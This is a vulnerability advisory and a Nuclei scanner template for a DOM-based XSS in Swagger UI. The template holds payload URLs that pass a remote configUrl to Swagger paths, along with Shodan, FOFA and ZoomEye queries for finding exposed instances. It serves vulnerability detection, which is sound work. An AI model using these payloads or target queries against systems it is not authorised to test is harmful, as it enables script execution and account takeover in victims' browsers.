Swagger UI versions 3.14.1 through 3.37.x are vulnerable to DOM-based Cross-Site Scripting (XSS) attacks. The vulnerability occurs when processing malicious configuration URLs that contain XSS payloads in the Swagger specification. An attacker can craft a malicious configUrl parameter that, when processed by Swagger UI, executes arbitrary JavaScript code in the victim's browser context.
PoC代码[已公开]
id: CVE-2025-8191
info:
name: Swagger UI >=3.14.1 < 3.38.0 - DOM Based Cross-Site Scripting
author: DhiyaneshDK
severity: medium
description: |
Swagger UI versions 3.14.1 through 3.37.x are vulnerable to DOM-based Cross-Site Scripting (XSS) attacks. The vulnerability occurs when processing malicious configuration URLs that contain XSS payloads in the Swagger specification. An attacker can craft a malicious configUrl parameter that, when processed by Swagger UI, executes arbitrary JavaScript code in the victim's browser context.
reference:
- https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/
- https://nvd.nist.gov/vuln/detail/CVE-2025-8191
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2025-8191
cwe-id: CWE-79
epss-score: 0.00965
epss-percentile: 0.75745
cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: smartbear
product: swagger_ui
shodan-query:
- http.component:"Swagger"
- http.component:"swagger"
- http.favicon.hash:"-1180440057"
fofa-query: icon_hash="-1180440057"
zoomeye-query: app:"Swagger UI"
tags: cve,cve2025,headless,swagger,xss,smartbear,dom-xss
headless:
- steps:
- args:
url: '{{BaseURL}}/{{swagger_path}}'
action: navigate
- action: waitdialog
name: swagger_dom
payloads:
swagger_path:
- 'swagger/index.html?configUrl=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
- 'swagger/index.html?url=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
- 'swagger-ui.html?configUrl=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
- 'swagger-ui.html?url=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
- 'swagger-ui/index.html?configUrl=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
- 'swagger-ui/index.html?url=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
- 'api-docs?configUrl=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
- 'docs?configUrl=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
- '?configUrl=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
- '?url=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
- 'open-api/swagger-ui.html?configUrl=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/helpers/payloads/swagger.json'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- swagger_dom == true
- type: word
part: body
words:
- "swagger"
case-insensitive: true
# digest: 4a0a00473045022055c2c3e9e8511eaf9a5778c35ca92d9445e609ca036bcffe768fafa1b01cf704022100d4b6b92a427d5e3b31b6260e93040e25bc918f306c5213eb49dd79068f48a5cc:922c64590222798bb761d5b6d8e72950